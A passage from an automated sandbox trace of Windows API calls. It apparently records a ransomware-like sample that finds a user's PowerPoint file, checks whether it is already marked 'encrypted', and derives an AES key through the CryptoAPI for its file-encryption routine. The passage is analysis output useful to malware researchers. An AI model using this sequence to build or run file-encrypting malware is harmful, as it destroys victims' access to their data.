HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.447] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.447] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.447] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.447] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.448] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.448] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.448] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.448] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.448] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x100688a0, ftLastWriteTime.dwHighDateTime=0x1d5c402, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 0x7c2100 [0036.448] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.448] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.448] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.449] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.449] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.449] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.449] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.449] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.449] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.449] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0036.450] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.450] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.450] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.450] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.450] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.450] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.450] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.450] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.451] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.451] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.451] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.451] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.451] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.451] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.451] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.451] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.451] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.452] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.452] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.452] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.452] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.452] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.452] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.452] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.452] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.452] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.453] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.453] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.453] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.453] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.453] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.453] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.453] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.454] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.454] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.454] CryptDestroyHash (hHash=0x7c2240) returned 1 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.454] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0036.454] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, 